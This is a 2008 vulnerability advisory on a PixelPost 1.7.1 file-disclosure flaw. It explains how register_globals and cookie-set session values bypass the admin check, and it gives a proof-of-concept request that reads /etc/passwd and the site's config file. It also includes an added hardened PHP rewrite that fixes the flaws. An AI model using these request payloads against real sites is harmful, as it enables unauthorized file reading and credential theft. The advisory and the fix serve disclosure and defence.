PixelPost 1.7.1 File Disclosure

Published 2008-06-09 (vulners.com, SECURITYVULNS:DOC:19988)

by Charles "real" F. <charlesfol[at]hotmail.fr>

[http://realn.free.fr]

Requires: register_globals = On, magic_quotes_gpc = Off

PROOF OF CONCEPT

****************

TARGET URL: http://[url]/addons/copy_folder.php?

_GETDATA=files[0]=/etc/passwd&cfgrow[password]=p4ssw0rd&cfgrow[timestamp]=0&cfgrow[imagepath]=file.txt%00

POSTDATA=copyfolder=ok&folder_path=ok

COOKDATA=_SESSION[pixelpost_admin]=p4ssw0rd

Note: a full path disclosure (FPD) is obtained just by loading http://[url]/addons/copy_folder.php.

This is useful for retrieving the config file, which is located at:

./includes/pixelpost.php

EXPLANATIONS

************

First of all, we have to bypass this line:

    32. if(!isset($_SESSION["pixelpost_admin"])
          || $cfgrow['password'] != $_SESSION["pixelpost_admin"]
          || $_GET["_SESSION"]["pixelpost_admin"] == $_SESSION["pixelpost_admin"]
          || $_POST["_SESSION"]["pixelpost_admin"] == $_SESSION["pixelpost_admin"])
          die ("Try another day!!");

The author tries to prevent $_SESSION from being overwritten through register_globals, but forgets that cookies are "registered" too.

To bypass this, we have to set a cookie: _SESSION[pixelpost_admin]=p4ssw0rd
and a GET var: cfgrow[password]=p4ssw0rd

We got ADMIN ACCESS.

    52. if($addon_handle = opendir($folder))
    53. {
    54.   while (false !== ($file = readdir($addon_handle)))
    55.   {
    56.     if($file != "." && $file != ".." && $file != ".DS_Store")
    57.     {
    58.       $files[]=$file;
    59.       $files_withdate[$counter]['filename'] = $file;
    60.       $exifdate = copy_folder_get_exif_date($folder.$file);
    61.       $files_withdate[$counter]['date'] = $exifdate;
    62.       $counter++;
    63.     } // end file !"."
    64.   } // end while
    65.   closedir($addon_handle);
    66. } // if addon_handle done

The $folder variable cannot be redefined: it is '/'.

But the $files[] array is never initialized, so through register_globals we can pre-seed it with the file we want to read.

Finally, at line 102, we reach the function that does the work:

    102. if(copy($file,$newpath))

But it is not that simple:

every file in "/" is copied to the same destination, file.txt,

so precise timing is needed to catch the config file.

An advantage is the "sleep(1)" which is called at every iteration of the copy().

Then we just fetch http://[url]/addons/file.txt
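As an added defensive example (not PixelPost's code and not the author's), the following rewrite closes the three weaknesses walked through above: the admin check that can be satisfied through register_globals, the uninitialized $files[] array, and the copy() that truncates on %00 and writes every file to the same name. The session flag set by the login handler, the incoming directory, and the way $cfgrow is loaded from ./includes/pixelpost.php are assumptions, marked in the code.

```php
<?php
// Added example (not PixelPost's code): a hardened rewrite of the pieces of
// addons/copy_folder.php quoted in the advisory. Assumptions are marked.
declare(strict_types=1);

// register_globals and magic_quotes_gpc no longer exist in PHP >= 5.4; on an
// old installation set both to Off in php.ini rather than trusting code to
// cope with them.
session_start();

/**
 * Admin check that looks only at server-side session state.
 * Assumption: the login handler sets $_SESSION['pixelpost_admin'] = true after
 * verifying the password, so the request never carries the password and the
 * comparison against a request-controlled $cfgrow['password'] disappears.
 */
function is_admin(array $session): bool
{
    return isset($session['pixelpost_admin']) && $session['pixelpost_admin'] === true;
}

/**
 * Lists regular files directly inside $folder. $files is initialised here,
 * so nothing from the request can pre-seed files[0].
 */
function list_folder_files(string $folder): array
{
    $files = [];
    $handle = @opendir($folder);
    if ($handle === false) {
        return $files;
    }
    while (false !== ($file = readdir($handle))) {
        if ($file === '.' || $file === '..' || $file === '.DS_Store') {
            continue;
        }
        if (is_file($folder . DIRECTORY_SEPARATOR . $file)) {
            $files[] = $file;
        }
    }
    closedir($handle);
    return $files;
}

/**
 * Copies one listed file into $imagepath under its own name. Refuses NUL
 * bytes (the %00 truncation), path components, anything that resolves outside
 * $folder (symlinks included), and overwriting an existing destination.
 */
function safe_copy(string $folder, string $file, string $imagepath): bool
{
    if (strpos($file, "\0") !== false || strpos($imagepath, "\0") !== false) {
        return false;
    }
    if ($file === '' || $file !== basename($file)) {
        return false;
    }
    $srcDir = realpath($folder);
    $dstDir = realpath($imagepath);
    if ($srcDir === false || $dstDir === false || !is_dir($dstDir)) {
        return false;
    }
    $src = realpath($srcDir . DIRECTORY_SEPARATOR . $file);
    if ($src === false || !is_file($src) || dirname($src) !== $srcDir) {
        return false;
    }
    $dst = $dstDir . DIRECTORY_SEPARATOR . $file;
    if (file_exists($dst)) {
        return false;
    }
    return copy($src, $dst);
}

// Driver. Assumption: in the real application $cfgrow is populated by
// including ./includes/pixelpost.php, never from $_GET; the fallback below
// only makes this file run stand-alone.
$cfgrow = $cfgrow ?? ['imagepath' => __DIR__ . '/images'];

if (!is_admin($_SESSION)) {
    http_response_code(403);
    exit('Try another day!!');
}

$folder    = __DIR__ . '/incoming';                 // assumed source directory
$imagepath = (string) ($cfgrow['imagepath'] ?? ''); // from config, not the request

foreach (list_folder_files($folder) as $file) {
    if (!safe_copy($folder, $file, $imagepath)) {
        error_log("copy_folder: refused $file");
    }
}
```

The point of keeping each file's own name in safe_copy() is that the race the advisory relies on (every file overwriting file.txt in turn) no longer exists, and the dirname() comparison against realpath($folder) is what stops a pre-seeded or symlinked entry from pulling in a file outside the addon directory.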

POC

***

Do it yourself.

You'll maybe have to multithread, have fun =)